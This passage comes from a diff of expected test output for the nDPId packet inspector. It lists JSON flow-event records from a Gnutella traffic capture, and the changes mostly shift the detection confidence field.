{"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} +00798{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":6445,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":257,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":90039,"flow_last_seen":287497,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":81,"flow_tot_l4_payload_len":271,"flow_avg_l4_payload_len":67,"midstream":0,"thread_ts_msec":454778,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"82.181.251.218","src_port":28681,"dst_port":36368,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} 00565{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":6445,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":156,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":82057,"flow_last_seen":433136,"flow_idle_time":200000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":120,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":454778,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"86.244.228.86","src_port":28681,"dst_port":10131,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00561{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":6445,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":176,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":82061,"flow_last_seen":373494,"flow_idle_time":200000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":96,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":454778,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"41.99.164.4","src_port":28681,"dst_port":6346,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} -00800{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":6445,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":246,"flow_state":"finished","flow_packets_processed":11,"flow_first_seen":89829,"flow_last_seen":287443,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":727,"flow_tot_l4_payload_len":3598,"flow_avg_l4_payload_len":327,"midstream":0,"thread_ts_msec":454778,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"96.65.68.194","src_port":28681,"dst_port":35481,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} +00800{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":6445,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":246,"flow_state":"finished","flow_packets_processed":11,"flow_first_seen":89829,"flow_last_seen":287443,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":727,"flow_tot_l4_payload_len":3598,"flow_avg_l4_payload_len":327,"midstream":0,"thread_ts_msec":454778,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"96.65.68.194","src_port":28681,"dst_port":35481,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} 00565{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":6445,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":157,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":82058,"flow_last_seen":371836,"flow_idle_time":200000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":454778,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"86.227.162.150","src_port":28681,"dst_port":6346,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00564{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":6445,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":209,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":82066,"flow_last_seen":431830,"flow_idle_time":200000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":454778,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"91.179.98.234","src_port":28681,"dst_port":6346,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} -00801{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":6445,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":261,"flow_state":"finished","flow_packets_processed":14,"flow_first_seen":90138,"flow_last_seen":287634,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":727,"flow_tot_l4_payload_len":4009,"flow_avg_l4_payload_len":286,"midstream":0,"thread_ts_msec":454778,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"60.241.48.194","src_port":28681,"dst_port":21301,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} +00801{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":6445,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":261,"flow_state":"finished","flow_packets_processed":14,"flow_first_seen":90138,"flow_last_seen":287634,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":727,"flow_tot_l4_payload_len":4009,"flow_avg_l4_payload_len":286,"midstream":0,"thread_ts_msec":454778,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"60.241.48.194","src_port":28681,"dst_port":21301,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} 00565{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":6445,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":159,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":82058,"flow_last_seen":311750,"flow_idle_time":200000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":72,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":454778,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"176.163.231.160","src_port":28681,"dst_port":6346,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00569{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":6445,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":302,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":90864,"flow_last_seen":287337,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":727,"flow_tot_l4_payload_len":1242,"flow_avg_l4_payload_len":207,"midstream":0,"thread_ts_msec":454778,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"185.187.74.173","src_port":28681,"dst_port":53489,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} -00801{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":6445,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":255,"flow_state":"finished","flow_packets_processed":18,"flow_first_seen":90039,"flow_last_seen":287415,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":727,"flow_tot_l4_payload_len":5624,"flow_avg_l4_payload_len":312,"midstream":0,"thread_ts_msec":454778,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"80.61.221.246","src_port":28681,"dst_port":30577,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} +00801{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":6445,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":255,"flow_state":"finished","flow_packets_processed":18,"flow_first_seen":90039,"flow_last_seen":287415,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":727,"flow_tot_l4_payload_len":5624,"flow_avg_l4_payload_len":312,"midstream":0,"thread_ts_msec":454778,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"80.61.221.246","src_port":28681,"dst_port":30577,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} 00564{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":6445,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":167,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":82059,"flow_last_seen":373496,"flow_idle_time":200000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":96,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":454778,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"93.29.107.176","src_port":28681,"dst_port":20363,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00567{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":6445,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":171,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":82060,"flow_last_seen":373497,"flow_idle_time":200000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":120,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":454778,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"196.217.132.111","src_port":28681,"dst_port":25394,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00564{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":6445,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":160,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":82058,"flow_last_seen":431829,"flow_idle_time":200000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":454778,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"83.150.49.35","src_port":28681,"dst_port":32448,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} -00797{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":6445,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":248,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":89829,"flow_last_seen":287526,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":81,"flow_tot_l4_payload_len":271,"flow_avg_l4_payload_len":67,"midstream":0,"thread_ts_msec":454778,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"66.30.221.181","src_port":28681,"dst_port":12012,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} +00797{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":6445,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":248,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":89829,"flow_last_seen":287526,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":81,"flow_tot_l4_payload_len":271,"flow_avg_l4_payload_len":67,"midstream":0,"thread_ts_msec":454778,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"66.30.221.181","src_port":28681,"dst_port":12012,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} 00564{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":6445,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":185,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":82062,"flow_last_seen":371838,"flow_idle_time":200000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":72,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":454778,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"109.132.196.58","src_port":28681,"dst_port":6346,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00564{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":6445,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":161,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":82058,"flow_last_seen":311749,"flow_idle_time":200000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":72,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":454778,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"213.120.26.86","src_port":28681,"dst_port":29946,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00562{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":6445,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":175,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":82060,"flow_last_seen":433136,"flow_idle_time":200000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":96,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":454778,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"115.69.62.99","src_port":28681,"dst_port":6346,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} -00802{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":6445,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":253,"flow_state":"finished","flow_packets_processed":18,"flow_first_seen":90005,"flow_last_seen":287678,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":727,"flow_tot_l4_payload_len":5605,"flow_avg_l4_payload_len":311,"midstream":0,"thread_ts_msec":454778,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"193.37.255.130","src_port":28681,"dst_port":61616,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} +00802{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":6445,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":253,"flow_state":"finished","flow_packets_processed":18,"flow_first_seen":90005,"flow_last_seen":287678,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":727,"flow_tot_l4_payload_len":5605,"flow_avg_l4_payload_len":311,"midstream":0,"thread_ts_msec":454778,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"193.37.255.130","src_port":28681,"dst_port":61616,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} 00566{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":6445,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":200,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":82064,"flow_last_seen":373495,"flow_idle_time":200000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":120,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":454778,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"138.199.16.123","src_port":28681,"dst_port":52993,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} -00799{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":6445,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":262,"flow_state":"finished","flow_packets_processed":14,"flow_first_seen":90138,"flow_last_seen":287483,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":727,"flow_tot_l4_payload_len":3990,"flow_avg_l4_payload_len":285,"midstream":0,"thread_ts_msec":454778,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"89.75.52.19","src_port":28681,"dst_port":46010,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} +00799{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":6445,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":262,"flow_state":"finished","flow_packets_processed":14,"flow_first_seen":90138,"flow_last_seen":287483,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":727,"flow_tot_l4_payload_len":3990,"flow_avg_l4_payload_len":285,"midstream":0,"thread_ts_msec":454778,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"89.75.52.19","src_port":28681,"dst_port":46010,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} 00565{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":6445,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":158,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":82058,"flow_last_seen":431830,"flow_idle_time":200000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":120,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":454778,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"118.166.226.70","src_port":28681,"dst_port":6346,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} -00664{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":6530,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":493,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":280014,"flow_last_seen":283055,"flow_idle_time":200000,"flow_min_l4_payload_len":174,"flow_max_l4_payload_len":174,"flow_tot_l4_payload_len":696,"flow_avg_l4_payload_len":174,"midstream":0,"thread_ts_msec":464672,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"239.255.255.250","src_port":57552,"dst_port":1900,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}} -00802{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":6530,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":331,"flow_state":"finished","flow_packets_processed":11,"flow_first_seen":101162,"flow_last_seen":287624,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":727,"flow_tot_l4_payload_len":3598,"flow_avg_l4_payload_len":327,"midstream":0,"thread_ts_msec":464672,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"45.31.152.112","src_port":28681,"dst_port":26851,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} -00800{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":6530,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":332,"flow_state":"finished","flow_packets_processed":7,"flow_first_seen":101837,"flow_last_seen":289958,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":120,"flow_tot_l4_payload_len":482,"flow_avg_l4_payload_len":68,"midstream":0,"thread_ts_msec":464672,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"213.229.111.224","src_port":28681,"dst_port":4876,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} -00802{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":6530,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":321,"flow_state":"finished","flow_packets_processed":8,"flow_first_seen":95893,"flow_last_seen":287340,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":727,"flow_tot_l4_payload_len":1914,"flow_avg_l4_payload_len":239,"midstream":0,"thread_ts_msec":464672,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"188.165.203.190","src_port":28681,"dst_port":21995,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} -00800{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":6530,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":317,"flow_state":"finished","flow_packets_processed":10,"flow_first_seen":95784,"flow_last_seen":287572,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":727,"flow_tot_l4_payload_len":2838,"flow_avg_l4_payload_len":283,"midstream":0,"thread_ts_msec":464672,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"96.236.205.7","src_port":28681,"dst_port":34794,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} -00799{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":6530,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":313,"flow_state":"finished","flow_packets_processed":8,"flow_first_seen":95716,"flow_last_seen":287440,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":727,"flow_tot_l4_payload_len":2001,"flow_avg_l4_payload_len":250,"midstream":0,"thread_ts_msec":464672,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"176.99.176.20","src_port":28681,"dst_port":6346,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} -00800{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":6530,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":319,"flow_state":"finished","flow_packets_processed":8,"flow_first_seen":95893,"flow_last_seen":287579,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":727,"flow_tot_l4_payload_len":2031,"flow_avg_l4_payload_len":253,"midstream":0,"thread_ts_msec":464672,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"164.132.10.25","src_port":28681,"dst_port":55302,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} -00799{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":6530,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":316,"flow_state":"finished","flow_packets_processed":10,"flow_first_seen":95784,"flow_last_seen":287857,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":727,"flow_tot_l4_payload_len":2839,"flow_avg_l4_payload_len":283,"midstream":0,"thread_ts_msec":464672,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"94.54.66.82","src_port":28681,"dst_port":63637,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} -00797{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":6530,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":312,"flow_state":"finished","flow_packets_processed":7,"flow_first_seen":95716,"flow_last_seen":426518,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":81,"flow_tot_l4_payload_len":359,"flow_avg_l4_payload_len":51,"midstream":0,"thread_ts_msec":464672,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"24.167.201.53","src_port":28681,"dst_port":47282,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} +00664{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":6530,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":493,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":280014,"flow_last_seen":283055,"flow_idle_time":200000,"flow_min_l4_payload_len":174,"flow_max_l4_payload_len":174,"flow_tot_l4_payload_len":696,"flow_avg_l4_payload_len":174,"midstream":0,"thread_ts_msec":464672,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"239.255.255.250","src_port":57552,"dst_port":1900,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}} +00802{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":6530,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":331,"flow_state":"finished","flow_packets_processed":11,"flow_first_seen":101162,"flow_last_seen":287624,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":727,"flow_tot_l4_payload_len":3598,"flow_avg_l4_payload_len":327,"midstream":0,"thread_ts_msec":464672,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"45.31.152.112","src_port":28681,"dst_port":26851,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} +00800{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":6530,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":332,"flow_state":"finished","flow_packets_processed":7,"flow_first_seen":101837,"flow_last_seen":289958,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":120,"flow_tot_l4_payload_len":482,"flow_avg_l4_payload_len":68,"midstream":0,"thread_ts_msec":464672,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"213.229.111.224","src_port":28681,"dst_port":4876,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} +00802{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":6530,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":321,"flow_state":"finished","flow_packets_processed":8,"flow_first_seen":95893,"flow_last_seen":287340,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":727,"flow_tot_l4_payload_len":1914,"flow_avg_l4_payload_len":239,"midstream":0,"thread_ts_msec":464672,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"188.165.203.190","src_port":28681,"dst_port":21995,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Gnutella","breed":"Potentially 